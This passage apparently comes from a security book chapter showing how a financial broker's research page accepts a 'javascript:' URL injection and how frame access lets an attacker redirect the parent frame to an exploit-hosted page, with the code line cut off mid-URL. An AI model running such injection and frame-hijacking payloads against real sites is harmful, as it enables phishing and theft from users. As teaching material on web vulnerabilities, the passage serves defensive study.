
D. Waterhouse. But a problem like that only makes us want to investigate further.
Remembering that javascript: is considered a registered protocol by browsers, let’s
try this (see Figure 5.14):
www.tdwaterhouse.com/research/wsod.asp?javascript:alert("test")
Figure 5.14 Registered Protocol Works!
From an attacker’s perspective, this is very good news. We can combine our
cross-frame trick since we have access to the content frame, and with the
javascript: access, we can easily control the parent frame as well.The code to do
this is where the DOM element interfacing applies:
parent.frames[0].location=
"http://ip.securescience.net/exploits/tdwaterhouse/webbroker1.tdwaterhouse.c ...